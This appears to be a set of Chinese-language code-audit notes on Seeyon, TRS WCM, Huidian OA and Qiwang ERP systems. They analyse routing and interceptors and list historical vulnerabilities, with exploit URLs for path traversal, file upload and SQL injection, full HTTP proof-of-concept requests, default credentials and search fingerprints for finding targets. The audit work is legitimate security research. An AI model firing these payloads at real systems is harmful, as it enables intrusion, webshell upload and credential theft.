 28 | 致远源代码位置：`Seeyon\A8\ApacheJetspeed\webapps`。核心路由配置在`Seeyon\A8\ApacheJetspeed\webapps\seeyon\WEB-INF\web.xml`中，它默认加载`/WEB-INF/spring.xml`，而`spring.xml`加载的是`spring-session.xml`，目的就是让请求过程中的HttpSession由Spring来处理。
 29 | 
 30 | 
 31 | 主要的过滤器
 32 | ```
 33 | CTPCsrfGuardFilter:  *.do | *.jsp 
 34 | CTPPandaGuardFilter:  *.do ｜ /rest/* 
 35 | CTPSecurityFilter:  *.do | *.jsp | *.jspx | *.psml | /rest/* | /webOffice/* | /services/* | /getAjaxDataServlet | /getAJAXMessageServlet | /getAJAXOnlineServlet | /htmlofficeservlet | /isignaturehtmlH5servlet | /isignaturehtmlservlet | /login/sso | /login/ssologout | /m-signature/* | /ofdServlet | /office/cache/* | /officeservlet | /wpsAssistServlet | /pdfservlet | /sursenServlet | /verifyCodeImage.jpg
 36 | CharacterEncodingFilter:  *.do
 37 | GenericFilter:  *.do | *.jsp | /office/cache/* 
 38 | GlobalFilter:  /m-signature/*
 39 | RestFilter:  /rest/authentication/ucpcLogin/*
 40 | IsignatureFilter:  /isignaturehtmlH5servlet
 41 | LoginPageURLFilter:  /org/*
 42 | ```
 43 | 
 44 | Servlet
 45 | 
 46 | ```
 47 | CTPDispatcherServlet: *.do
 48 | AJAXOnlineServlet: /getAJAXOnlineServlet
 49 | AJAXMessageServlet: /getAJAXMessageServlet
 50 | ActionServlet: /m-signature/*
 51 | SSOLoginServlet: /login/sso
 52 | SSOLogoutServlet: /login/ssologout
 53 | AJAXDataServlet: /getAjaxDataServlet -> 反射调用类和方法 
 54 | OfficeServlet: /officeservlet
 55 | WpsAssistServlet: /wpsAssistServlet  -> 任意文件下载
 56 | PdfServlet: /pdfservlet              -> 已修复金格文件写入RCE
 57 | OfdServlet: /ofdServlet
 58 | HtmlOfficeServlet: /htmlofficeservlet -> 已修复金格文件写入RCE
 59 | ISignatureHtmlServlet: /isignaturehtmlservlet
 60 | KGHTML5Servlet: /isignaturehtmlH5servlet
 61 | VerifyCodeImageServlet: /verifyCodeImage.jpg
 62 | CtpAxis2Servlet: /axis2/* | /services/*
 63 | FileOutputService: /services/downloadService
 64 | URLShortenerServlet: /g/*
 65 | ConfigObtainServlet: /configObtain
 66 | ServerStatusCheckServlet: /serverStatusCheck
 67 | ```
 68 | 
 69 | 对于REST Web Service的配置，访问路径是`/rest/*`或`/webOffice/*`
 70 | 
 71 | ```
 72 |     <servlet>
 73 |         <servlet-name>rest</servlet-name>
 74 |         <servlet-class>org.glassfish.jersey.servlet.ServletContainer</servlet-class>
 75 |         <init-param>
 76 |             <param-name>jersey.config.server.provider.packages</param-name>
 77 |             <param-value>
 78 |                 com.seeyon.ctp.rest.resources,com.fasterxml.jackson.jaxrs,com.fasterxml.jackson.jaxrs.json,com.fasterxml.jackson.jaxrs.xml,com.seeyon.ctp.rest.filter
 79 |             </param-value>
 80 |         </init-param>
 81 |         <init-param>
 82 |             <param-name>jersey.config.server.provider.classnames</param-name>
 83 |             <param-value>com.seeyon.ctp.rest.filter.AuthorizationRequestFilter,com.seeyon.ctp.rest.filter.ResponseFilter,com.seeyon.ctp.rest.filter.WebOfficeLogFilter,org.glassfish.jersey.media.multipart.MultiPartFeature,com.seeyon.ctp.rest.filter.ResourceCheckRoleAccessFilter</param-value>
 84 |         </init-param>
 85 |         <init-param>
 86 |             <param-name>jersey.config.server.provider.scanning.recursive</param-name>
 87 |             <param-value>false</param-value>
 88 |         </init-param>
 89 |         <load-on-startup>4</load-on-startup>
 90 |     </servlet>
 91 | ```
 92 | ### xx.do
 93 | 如果调试`/seeyon/individualManager.do?method=modifyIndividual`这个路由，会发现最终执行到`/seeyon/WEB-INF/lib/seeyon-apps-common.jar`包中`IndividualManagerController`类的`modifyIndividual`方法。这个jar包中都是Sesyon自定义的各种Controller。那么可以得知，访问xxController，大致是`xx.do?method=方法名`。Controller和访问路径的对应关系可以`/WEB-INF/cfgHome`文件夹下相应的Spring配置文件中查找。
 94 | 
 95 | ### AJAXDataServlet
 96 | 
 97 | 用户名密码爆破就是用的这个Servlet。本文用的A8.1中已经没有此漏洞，但是依旧存在这个Servlet。它的doPost方法也是调用的doGet，doGet的核心逻辑如下
 98 | 
 99 | ```java
100 | public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
101 |   String serviceName = request.getParameter("S");
102 |   String methodName = request.getParameter("M");
103 |   String returnValueType = request.getParameter("RVT"); // 设置响应的类型，xml为"text/xml",否则为"text/html"
104 |   try {
105 |     if (this.ajaxService == null) {
106 |         this.ajaxService = (AJAXService)AppContext.getBean("AJAXService");
107 |     }
108 |     AJAXRequest ajaxRequest = new AJAXRequestImpl(request, response, serviceName, methodName);
109 |     AJAXResponse ajaxResponse = this.ajaxService.processRequest(ajaxRequest); // 反射调用service的method
110 | }
111 | ```
112 | 
113 | 接收类和方法，然后反射调用。查看AJAXService支持的Bean对象一共162个。都定义在`webapps/seeyon/WEB-INF/cfgHome/plugin/`各类文件夹下的`spring-xx-manager.xml`文件中。
114 | 
115 | 在代码审计时需注意，即使某个方法存在漏洞，但反射中并没有传入方法参数的地方，所以需要找可利用的无参方法。
116 | 
117 | ## 历史漏洞
118 | 
119 | |     漏洞名称     |                           访问路径                           | 影响版本 |
120 | | :--------------: | :----------------------------------------------------------: | :------: |
121 | | 用户名密码爆破 | `/seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=admin&P_2_String=wy123456` | A8 |
122 | | 任意用户密码修改 | `/seeyon/individualManager.do?method=modifyIndividual` | A8 |
123 | | htmlofficeservlet 金格文件写入RCE  | `/seeyon/htmlofficeservlet`、`/seeyon/pdfservlet` | A8 |
124 | | fastjson反序列化 | `/seeyon/main.do?method=changeLocale`、`/seeyon/sursenServlet` | A6 |
125 | | webmail.do任意文件下载 | `/seeyon/webmail.do?method=doDownloadAtt&filename=xx.txt&filePath=../conf/datasourceCtp.properties` | A8 |
126 | | 登陆绕过+任意文件上传 | `/seeyon/thirdpartyController.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip` | A8 |
127 | | 登陆绕过+任意文件上传 | `/seeyon/ajax.do;JSESSIONID=getAjaxDataServlet?method=ajaxAction&managerName=formulaManager&requestCompress=gzip&S=ajaxEdocMan ager&M=ajaxCheckNodeHasExchangeType` | A8 |
128 | | 目录遍历 | `/seeyonreport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../&currentUserName=admin&currentUserId=1&isWebReport=true` | A6 |
129 | | wpsAssistServlet任意文件下载 | `/seeyon/wpsAssistServlet?flag=template&templateUrl=../../base/conf/datasourceCtp.properties` | A8 |
130 | | wpsAssistServlet任意文件上传 | `/seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/debugggg.jsp&fileId=2` | A8 |
131 | | 用户Session泄漏 | `/yyoa/ext/https/getSessionList.jsp?cmd=getAll` | A6 |
132 | | test.jsp SQL注入 | `/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20database())` | A6 |
133 | | setextno.jsp SQL注入 | `/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999) union all select 1,2,(md5(1)),4#` | A6 |
134 | | 配置信息泄漏 | `/yyoa/ext/trafaxserver/SystemManage/config.jsp` | A6 |
135 | | 数据库账户泄漏 | `/yyoa/createMysql.jsp`、`/yyoa/ext/createMysql.jsp` | A6 |
136 | 
137 | 在比较新的A8（202110）版本中，对于文件上传/下载，都做了如下的限制，会判断文件是否和预设的文件夹在同一目录下，从而限制了跨目录操作
138 | ```
139 | if (!FileUtil.inDirectory(file, directory)) {...}
140 | ```
141 | 


--------------------------------------------------------------------------------
/Java_OA/WCM_Audit.md:
--------------------------------------------------------------------------------
 1 | # TRS_WCM（内容协作平台）
 2 | 
 3 | TRS北京拓尔思信息技术股份有限公司，旗下产品包含WCM（内容管理系统）、WAS（文本检索系统）、IDS（身份管理系统）等。
 4 | 
 5 | WCM安装，（以WCM7为例）双击`TRSWCMV7_Build1015_6612_20130506_Windows.exe`，按照提示一直进行下一步即可。完成后访问`http://ip:8086/wcm`。端口根据安装时的设定进行更改。登录时默认的用户名密码如下
 6 | ```
 7 | admin trsadmin
 8 | ```
 9 | 
10 | 帮助文档： https://hd.gov.cn/bz/201906/P020190620365727503462.pdf
11 | 
12 | 
13 | ## 架构分析
14 | 
15 | 核心文件都位于Tomcat目录下`/TRS2013/Tomcat/webapps/wcm/`，wcm下主要包含功能模块（jsp）和`/WEB-INF`文件夹。jsp的访问路径是到wcm的相对路径
16 | 
17 | web.xml中的定义的不参与过滤的jsp和路径
18 | ```
19 | 	<filter>
20 | 		<filter-name>LoginCheckFilter</filter-name>
21 | 		<filter-class>com.trs.servlet.LoginCheckFilter</filter-class>
22 | 		<init-param>
23 | 			<param-name>notFilterJsp</param-name>
24 | 			<param-value>
25 | 				login.jsp,login_dowith.jsp,loginpage.jsp,reg_newuser.jsp,reg_newuser_dowith.jsp,user_exist.jsp,license_edit.jsp,license_edit_dowith.jsp,govcenter.do,govfileuploader.do,infoview.do,deployerlogin.jsp,deployerlogin_dowith.jsp,index.jsp,receiveMAS.jsp
26 | 			</param-value>
27 | 		</init-param>
28 | 		<init-param>
29 | 			<param-name>notFilterPath</param-name>
30 | 			<param-value>
31 | 				WCMV6/gkml/sqgk,app/interview,app/special/design_for_interview.jsp,app/infoview/gateway
32 | 			</param-value>
33 | 		</init-param>
34 |   </filter>
35 | ```
36 | web.xml中定义的路由和对应类
37 | ```
38 | /clusterservice -> com.trs.cluster.ext.wcm.servlet.AutoRestartServlet
39 | /center.do -> com.trs.webframework.controler.servlet.ServiceControler
40 | /verifycode.do -> com.trs.weblet.util.verfiycode.VerifyCodeServlet
41 | /infoview.do -> com.trs.components.infoview.filter.InfoviewDataImportFilter
42 | /govcenter.do -> com.trs.webframework.controler.servlet.NoLoginServiceControler
43 | /fileuploader.do -> com.trs.webframework.controler.servlet.FileUploader
44 | /govfileuploader.do -> com.trs.webframework.controler.servlet.NoLoginServiceControler
45 | /app/video/ReceiveMASServlet -> com.trs.components.video.ReceiveMASServlet
46 | ```
47 | 
48 | 


--------------------------------------------------------------------------------
/Java_OA/huidianOA.md:
--------------------------------------------------------------------------------
  1 | ## fofa指纹
  2 | 
  3 | ```
  4 | js_name="www/lib/ionic/js/ionic.bundle.min.js"
  5 | ```
  6 | 
  7 | ## 框架结构
  8 | 
  9 | 整体框架结构也很简单（不知道是不是因为代码不完整）。`docviewer-webapp`文件夹下包含`WEB-INF`和`META-INF`两个文件夹。
 10 | ```
 11 | WEB-INF
 12 |     |-classes
 13 |         |-com
 14 |             |- grcspsmartdot
 15 |                 |- grcsp
 16 |                     |- doc
 17 |                         |- bootstrap
 18 |                             |- DocViewerServiceBootStrap
 19 |                             |- ServletIndexListener
 20 |                         |- controller
 21 |                             |- ConvertHtmlController
 22 |                             |- ConvertToOneController
 23 |                             |- DocViewerController
 24 |                             |- HealthCheckController
 25 |                             |- SystemConfigurationController
 26 |                             |- WordOperationController
 27 |         |-spring
 28 |             |- docviewer-context.xml
 29 |             |- docviewer-servlet.xml
 30 |     |-jsp
 31 |         ｜- healthCheck.jsp
 32 |         ｜- mview.jsp
 33 |         ｜- parameter.jsp
 34 |         ｜- view.jsp
 35 |     |-lib
 36 |     |-static
 37 |     |-web.xml <!-- servlet由spring来处理-->
 38 |     |-web.xml_2_5
 39 |     |-web.xml_3_0
 40 |     |-weblogic.xml
 41 | ```
 42 | 
 43 | web.xml中的配置很简单，只声明servlet都由spring来处理。spring配置引入的是`WEB-INF\classes\spring`文件夹下的文件。跟进一下`docviewer-servlet.xml`
 44 | 
 45 | ```xml
 46 | 	<mvc:resources location="/resources/" mapping="/resources/**" cache-period="3600" />
 47 | 	<mvc:resources mapping="/static/doc/**" location="file:///${docviewer.localFilePath}/doc/" />
 48 | 	<mvc:resources mapping="/static/**" location="/WEB-INF/static/" />
 49 | 	
 50 | 	<mvc:view-controller path="/docViewer" view-name="/view" />
 51 | 	<mvc:view-controller path="/mdocViewer" view-name="/mview" />
 52 | 	<mvc:view-controller path="/healthCheck" view-name="/healthCheck" />
 53 | 	<mvc:view-controller path="/clearHasConvertDocs" view-name="/clearHasConvertDocs" />
 54 | 	<mvc:view-controller path="/admin/parameterSetting" view-name="/parameter" />
 55 | 
 56 | 	<bean id="viewResolver" class="org.springframework.web.servlet.view.InternalResourceViewResolver">
 57 | 		<property name="prefix" value="/WEB-INF/jsp/" />
 58 | 		<property name="suffix" value=".jsp"></property>
 59 | 	</bean>
 60 | ```
 61 | **jsp的路由**
 62 | `<mvc:view-controller>`元素中的`view-name`属性指定了与特定URL路径关联的视图的名称。例如`<mvc:view-controller path="/docViewer" view-name="/view" />`意思即为访问`/docViewer`路径时，会由`/view`视图来处理。xml最后定义了视图解析器，会将逻辑视图名称映射到`/WEB-INF/jsp/`下的JSP文件。
 63 | 
 64 | **servlet的路由**
 65 | spring框架要么在配置文件中配置路由，要么可能用了注解的方式。查看Controller文件夹下的类，写法如下。那么可以认定组件用spring注解的方式来定义路由。
 66 | 
 67 | ```java
 68 | @RestController
 69 | @RequestMapping({"/wordOperationRest"})
 70 | public class WordOperationController {
 71 |     private static final Logger log = LoggerFactory.getLogger(WordOperationController.class);
 72 | 
 73 |     @RequestMapping(
 74 |         value = {"/taoda"},
 75 |         method = {RequestMethod.POST},
 76 |         produces = {"application/json"}
 77 |     )
 78 |     @ResponseBody
 79 |     public Object taoda(@RequestParam(value = "bodymarkname",required = false) String bodymarkname, HttpServletRequest request, HttpServletResponse response) {
 80 |         return this.docTaoDaDeal(request, response, bodymarkname); // 实际处理方法
 81 |     }
 82 | ```
 83 | 
 84 | ### taoda任意文件上传漏洞
 85 | 
 86 | 2023年HW期间爆出一个漏洞—taoda任意文件上传漏洞。对应的就是上面提到的这个路由。`taoda`实际会走到`docTaoDaDeal`方法来处理。该方法存在明显的文件上传处理逻辑。
 87 | 
 88 | ```java
 89 | private Object docTaoDaDeal(HttpServletRequest request, HttpServletResponse response, String bodymarkname) {
 90 |         WordAttInfo wordAtt = null;
 91 | 
 92 |         try {
 93 |             wordAtt = new WordAttInfo();
 94 |             if (null != bodymarkname && bodymarkname.trim().length() > 0) {
 95 |                 wordAtt.setBodyMarkName(bodymarkname);
 96 |             }
 97 | 
 98 |             DiskFileItemFactory factory = new DiskFileItemFactory();
 99 |             ServletFileUpload upload = new ServletFileUpload(factory);
100 |             request.setCharacterEncoding("utf-8");
101 |             upload.setHeaderEncoding("utf-8");
102 |             if (ServletFileUpload.isMultipartContent(request)) {
103 |                 List<FileItem> list = upload.parseRequest(request);
104 |                 Iterator i$ = list.iterator();
105 | 
106 |                 String fileParamName;
107 |                 String filename;
108 |                 String decodeValue;
109 |                 while(i$.hasNext()) {
110 |                     FileItem item = (FileItem)i$.next();
111 |                     if (item.isFormField()) { // isFormField返回true代表:表单处理逻辑
112 |                         fileParamName = item.getFieldName();
113 |                         filename = item.getString("utf-8");
114 |                         decodeValue = URLDecoder.decode(filename, "utf-8");
115 |                         if (fileParamName.toLowerCase().equals("data")) {
116 |                             log.debug("传入的data数据:" + decodeValue);
117 |                             wordAtt.setJsonData(decodeValue);
118 |                         }
119 | 
120 |                         if (fileParamName.toLowerCase().equals("bodymark") && filename.trim().length() > 0) {
121 |                             wordAtt.setBodyMarkName(decodeValue);
122 |                         }
123 |                     } else { // isFormField返回false代表:文件上传处理逻辑
124 |                         fileParamName = item.getFieldName(); // 获取表单名称
125 |                         filename = item.getName(); // 获取上传的文件名
126 |                         filename = filename.substring(filename.lastIndexOf("\\") + 1); // 获取最后一个反斜杠的\的位置
127 |                         if (filename != null && !filename.trim().equals("")) {
128 |                             boolean isHaveDocFile = false;
129 |                             if (fileParamName.toLowerCase().indexOf("doc") > -1) {
130 |                                 wordAtt.docListAdd(filename);
131 |                                 isHaveDocFile = true;
132 |                             }
133 | 
134 |                             if (fileParamName.toLowerCase().equals("template")) {
135 |                                 wordAtt.setTemplateName(filename);
136 |                                 isHaveDocFile = true;
137 |                             }
138 | 
139 |                             if (isHaveDocFile) {
140 |                                 if (null == wordAtt.getTmpDirectory()) { 
141 |                                     String tmpDirectoryName = Util.md5(System.currentTimeMillis() + filename);
142 |                                     wordAtt.setTmpDirectoryName(tmpDirectoryName);
143 |                                     String tDirectory = DocviewConfig.getString("docviewer.localFilePath") + "\\doc\\taoda\\" + tmpDirectoryName;
144 |                                     wordAtt.setTmpDirectory(tDirectory); //  tmp目录
145 |                                     Util.createDir(tDirectory);
146 |                                     log.info("生成套打文件临时目录:" + tDirectory);
147 |                                 }
148 | 
149 |                                 File uploadFile = new File(wordAtt.getTmpDirectory() + "\\" + filename); // filename是传入的
150 |                                 item.write(uploadFile);
151 |                             }
152 | 
153 |                             item.delete();
154 |                         }
155 |                     }
156 |                 }
157 | 
158 |                 WordTaoDaService wdService = new WordTaoDaService();
159 |                 wdService.taoda(wordAtt);
160 |             } 
161 |         } 
162 | ```
163 | 
164 | 如果上述`isFormField`返回`false`就会当成文件上传来处理。而`isFormField`方法实际是根据`Content-Disposition`头部的`form-data`是否匹配到文件来判断的。普通文本和文件的`Content-Disposition`区别如下
165 | 
166 | ```
167 | # 普通文本
168 | Content-Disposition: form-data; name="username"
169 | # 文件
170 | Content-Disposition: form-data; name="file"; filename="example.txt"
171 | ```
172 | 
173 | 那么想要上传文件，就需要请求包构造时其中一个字段包含filename。
174 | 
175 | 最终的POC如下
176 | 
177 | ```
178 | POST /_api/docviewer-webapp/wordOperationRest/taoda HTTP/1.1 
179 | Host: ip
180 | Accept-Encoding: gzip, deflate
181 | Accept: */*
182 | Accept-Language: en-US;q=0.9,en;q=0.8
183 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
184 | Connection: close
185 | Cache-Control: max-age=0
186 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuu0budsPuEXH7dY4
187 | Content-Length: 446
188 | 
189 | ------WebKitFormBoundaryuu0budsPuEXH7dY4
190 | Content-Disposition: form-data; name="bodymarkname"
191 | 
192 | taoda
193 | ------WebKitFormBoundaryuu0budsPuEXH7dY4
194 | Content-Disposition: form-data; name="template"
195 | 
196 | 1111
197 | ------WebKitFormBoundaryuu0budsPuEXH7dY4
198 | Content-Disposition: form-data; name="doc"; filename="../../../../fjzh/apache-tomcat-7.0.67/webapps/docviewer-webapp/1.txt"
199 | Content-Type: images/gif
200 | 
201 | 123 
202 | ------WebKitFormBoundaryuu0budsPuEXH7dY4--
203 | ```
204 | 
205 | 


--------------------------------------------------------------------------------
/Java_OA/jwycbjnoyees.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Java_OA/jwycbjnoyees.jar


--------------------------------------------------------------------------------
/Java_OA/qiwangzhizao.md:
--------------------------------------------------------------------------------
  1 | FOFA指纹
  2 | 
  3 | ```
  4 | title="企望制造ERP系统"
  5 | ```
  6 | 
  7 | ## 框架结构
  8 | 
  9 | `web.xml`核心内容如下
 10 | 
 11 | ```xml
 12 |   <filter>
 13 |     <filter-name>struts2</filter-name>
 14 |     <filter-class>org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter</filter-class>
 15 |   </filter>
 16 |   <filter>
 17 |     <filter-name>WitParameterFilter</filter-name>
 18 |     <filter-class>com.main.tools.WitParameterFilter</filter-class>
 19 |   </filter>
 20 |   <filter-mapping>
 21 |     <filter-name>WitParameterFilter</filter-name>
 22 |     <url-pattern>/*</url-pattern>
 23 |   </filter-mapping>
 24 |   <filter-mapping>
 25 |     <filter-name>struts2</filter-name>
 26 |     <url-pattern>*</url-pattern>
 27 |   </filter-mapping>
 28 | ```
 29 | 
 30 | 所有的路由都会经过Struts2过滤器处理。那么具体的路由就要从Struts2的配置文件（如struts.xml）中查找。
 31 | 
 32 | `struts.xml`部分配置如下。主要配置了拦截器并且包含了其他xml配置文件。
 33 | 
 34 | ```xml
 35 | <interceptors>
 36 |     <interceptor name="loginChecked" class="com.main.tools.LoginCheckInterceptor"</interceptor>
 37 |     <interceptor name="operationTime" class="com.main.tools.OperationTimeInterceptor"></interceptor>
 38 | 	 	<interceptor-stack name="witStack">
 39 | 	 		<interceptor-ref name="loginChecked"></interceptor-ref>
 40 | 	 		<interceptor-ref name="operationTime"></interceptor-ref>
 41 | 	 		<interceptor-ref name="defaultStack"></interceptor-ref>
 42 | 	 	</interceptor-stack>
 43 | </interceptors>
 44 | <default-interceptor-ref name="witStack"/>
 45 | <include file="struts-default.xml"></include> 
 46 | <include file="com/config/struts/Adman.xml"></include>
 47 | ...
 48 | <include file="com/config/struts/ECom.xml"></include>
 49 | <include file="com/config/struts/Pay.xml"></include>
 50 | ```
 51 | 
 52 | ### 路由特点
 53 | 
 54 | `com/config/struts/xx.xml`是自定义配置文件，其中包含了Action映射等。以`com/config/struts/MainFunctions.xml`为例，部分配置如下
 55 | 
 56 | ```xml
 57 | 	<package name="mainFunctions" extends="ErrorHandler" namespace="/mainFunctions">
 58 | 		<action name="listallData" class="DrawGridAction" method="listallData"> </action>
 59 | 		<action name="listData" class="DrawGridAction" method="listData"> </action>
 60 | 		<action name="drawGrid" class="DrawGridAction" method="drawGrid"> </action>
 61 | 		...
 62 | 		<action name="comboxstore" class="DBUtilsAction" method="executeDBList"></action> 
 63 | 		<action name="eComComboxstore" class="DBUtilsAction" method="eComExecuteDBList"></action> 
 64 | 		<action name="comboxstorePage" class="DBUtilsAction" method="executeDBListPage"></action> 
 65 | 	</package>
 66 | ```
 67 | 
 68 | `<package>`标签中的namespace命令空间代表了包的前缀，该package下的所有路由都以`/mainFunctions`为路由前缀。`<action>`标签的name属性代表路由，class属性是相应的处理类。那么访问路由的方式为`'namespace' + 'action_name' + '.action'`。
 69 | 
 70 | 例如想要访问`DBUtilsAction`，那么对应的路由即为`/mainFunctions/comboxstore.action`
 71 | 
 72 | ### 拦截器
 73 | 
 74 | 首先看一下`LoginCheckInterceptor`，从名称上看一般是用于权限控制。拦截器的具体逻辑如下
 75 | 
 76 | ```java
 77 |     public String intercept(ActionInvocation arg0) throws Exception {
 78 |         String url = ServletActionContext.getRequest().getRequestURL().toString();
 79 |         HttpServletRequest httpRequest = ServletActionContext.getRequest();
 80 |         HttpServletResponse httpResponse = ServletActionContext.getResponse();
 81 |         httpResponse.setContentType("text/html");
 82 |         httpResponse.setCharacterEncoding("UTF-8");
 83 |         String header = httpRequest.getHeader("x-requested-with");
 84 |         String basePath = httpRequest.getScheme() + "://" + httpRequest.getServerName() + ":" + httpRequest.getServerPort() + httpRequest.getContextPath() + "/";
 85 |         if (WitFunction.actionCheck(url)) { // 如果返回true，可以继续执行后续逻辑
 86 |             try {
 87 |                 return arg0.invoke();
 88 |             } catch (Exception var9) {
 89 |                 var9.printStackTrace();
 90 |                 return this.check(var9, arg0);
 91 |             }
 92 |         } else if (!httpRequest.isRequestedSessionIdValid()) {
 93 |             if (header != null && header.equalsIgnoreCase("XMLHttpRequest")) {
 94 |                 httpResponse.sendError(999);
 95 |                 return "ERROR";
 96 |             } else {
 97 |                 return "login";
 98 |             }
 99 |         } else {
100 |             Staff staff = (Staff)httpRequest.getSession().getAttribute("staff");
101 |             if (staff == null) {
102 |                 if (header != null && header.equalsIgnoreCase("XMLHttpRequest")) {
103 |                     httpResponse.sendError(999);
104 |                     return "ERROR";
105 |                 } else {
106 |                     return "login";
107 |                 }
108 |             } else {
109 |                 try {
110 |                     return arg0.invoke();
111 |                 } catch (Exception var10) {
112 |                     var10.printStackTrace();
113 |                     return this.check(var10, arg0);
114 |                 }
115 |             }
116 |         }
117 |     }
118 | ```
119 | 
120 | 如果`WitFunction.actionCheck(url)`可以为true的话，就可以直接执行某个Action的方法。跟进`actionCheck`方法
121 | 
122 | ```java
123 |     public static boolean actionCheck(String url) {
124 |         String SODeliveryLorryAutoAllocateByLorryLoginCookie = (String)WitSession.get("SODeliveryLorryAutoAllocateByLorryLoginCookie");
125 |         boolean checkFlag = false;
126 |         if (!url.contains("staff/staff.action") && !url.contains("staff/initPass.action") && !url.contains("cookieLogin.action") ...) {
127 |             if (!url.contains("staff/EComLogin.action") && !url.contains("staff/EComLogout.action") && ...) {
128 |                 if (url.contains("Pay/UnionWapPayResponse.action") || url.contains("Pay/AliWapPayResponse.action") || url.contains("Pay/WechatPayResponse.action")) {
129 |                     checkFlag = true;
130 |                 }
131 |             } else {
132 |                 checkFlag = true;
133 |             }
134 |         } else {
135 |             checkFlag = true;
136 |         }
137 | 
138 |         return checkFlag;
139 |     }
140 | ```
141 | 
142 | 这个if层次写分为了三层。想要返回true，实际上就是url中包含上述三个if中的任意路由即可
143 | 
144 | ```
145 | # 第一个if
146 | staff/staff.action
147 | staff/initPass.action
148 | cookieLogin.action
149 | mainFunctions/comboxstore.action
150 | staff/generateMacAddress.action
151 | staff/SessionSync.action
152 | DI/DIExecute.action
153 | staff/getAppName.action
154 | staff/getLoginParams.action
155 | staff/CheckCompanyID.action
156 | WEMainImage/getImage.action
157 | mainFunctions/WELanguageObjectGenerate.action
158 | WEOnlineUsersList/drawGrid.action
159 | WEOnlineUsersList/listallData.action
160 | WEOnlineUsersList/WEOnlineUserRemove.action
161 | DI/WeiXinExecute.action
162 | staff/WeiXinLogin.action
163 | staff/MobileCookieLogin.action
164 | staff/MobileLogin.action
165 | /KeyGenEComCustAddressUpdate/
166 | WeiXinStaff/StaffRegist.action
167 | WeiXinStaff/listFields.action
168 | WeiXinStaff/drawGrid.action
169 | GZWeixinStaff/WeixinTokenCheck.action
170 | GZWeixinStaff/MenuCreate.action
171 | DI/DIFileExecute.action
172 | staff/SODeliveryLorryAutoAllocateByLorryLogin.action  StaffAction.SODeliveryLorryAutoAllocateByLorryLogin 
173 | SODeliveryLorry/SODeliveryLorryAutoAllocateByLorry.action
174 | staff/VerifySwitchCheck.action
175 | staff/GetVcodeByVerifyType.action
176 | EComInit/EComInitStore.action
177 | CheckIn/attendanceCheckIn.action
178 | CheckIn/getPersonName.action
179 | # 第二个if
180 | staff/EComLogin.action
181 | staff/EComLogout.action
182 | mainfunctions/GetSmsVcode.action
183 | staff/EComStaff
184 | BoardTypeDefine/getBoardPicture.action
185 | staff/EComAutoLogin.action
186 | DistrictManagement/listDistrictData.action
187 | staff/EComNetWorkIDRecommend.action
188 | EComSheetBoardS/BoardQualityList.action
189 | EComProduct/listallData.action
190 | staff/CheckRequestedSession.action
191 | EComJoinApply/JoinInApply.action
192 | EComSuggestionsAndFeedBack/SuggestionSubmit.action
193 | EComJoinApply/listApplyRecord.action
194 | EComSuggestionsAndFeedBack/listFeedBackRecords.action
195 | # 第三个if
196 | Pay/UnionWapPayResponse.action
197 | Pay/AliWapPayResponse.action
198 | Pay/WechatPayResponse.action
199 | ```
200 | 
201 | ## 历史漏洞
202 | ### comboxstore sql注入漏洞
203 | ```
204 | POST /mainFunctions/comboxstore.action HTTP/1.1
205 | Host: ip:port
206 | Pragma: no-cache
207 | Cache-Control: no-cache
208 | Upgrade-Insecure-Requests: 1
209 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
210 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
211 | Accept-Encoding: gzip, deflate
212 | Accept-Language: zh-CN,zh;q=0.9
213 | Cookie: JSESSIONID=D9A697DEC59C33BC8C75408BF5214207
214 | Connection: close
215 | Content-Type: application/x-www-form-urlencoded
216 | Content-Length: 28
217 | 
218 | comboxsql=select%20@@version
219 | ```
220 | 
221 | 有回显的sql注入漏洞。漏洞位于`MainFunctions.xml`，寻找`comboxstore`的对应配置。
222 | 
223 | ```xml
224 | <action name="comboxstore" class="DBUtilsAction" method="executeDBList"></action> 
225 | ```
226 | 
227 | 找到`DBUtilsAction.executeDBList()`
228 | 
229 | ```java
230 |     public void executeDBList() throws Exception {
231 |         HttpServletResponse response = ServletActionContext.getResponse();
232 |         response.setCharacterEncoding("UTF-8");
233 |         String list = this.dbUtilsService.DBListsql(this.comboxsql, this.witParams);
234 |         StringBuffer sbJson = new StringBuffer();
235 |         sbJson.append(list);
236 |         response.getWriter().write(sbJson.toString());
237 |     }
238 | ```
239 | 
240 | struts2的变量如果被声明成这个类的成员变量，就可以通过请求传参，如果参数名称和属性名称一致，struts2会将参数值赋值给属性值。也就是说上面这个方法中的`this.comboxsql`和`this.withParams`分别可以通过`comboxsql=xx`和`withParams=xx`传参。
241 | 
242 | 跟进`DBListsql()`，后续最终调用的是`WitDAO.GetRSMDBySql()`，对sql语句会进行一些处理，然后调用`statament.executeQuery(Sql)`执行。
243 | 
244 | ```java
245 | private WitResultSet GetRSMDBySql(String Sql, String dataSourceName, boolean isprofile, boolean limit, Map witParams) {
246 | 	Sql = this.SQLFormat(Sql);
247 |   Sql = WitFunction.replaceRptSql(Sql, dataSourceName);
248 |   Connection con = getConnection(dataSourceName, witParams);
249 |   ResultSet rs = null;
250 |   ResultSetMetaData rsmd = null;
251 |   Statement statement = null;
252 |   WitResultSet witResultSet = new WitResultSet();
253 | 
254 |   try {
255 |     statement = con.createStatement();
256 |     this.setMaxExecSecThread(witParams, con, Sql, dataSourceName);
257 |     rs = statement.executeQuery(Sql);
258 |     this.setExecSqlFinished(witParams);
259 |   }
260 | }
261 | ```
262 | 
263 | 


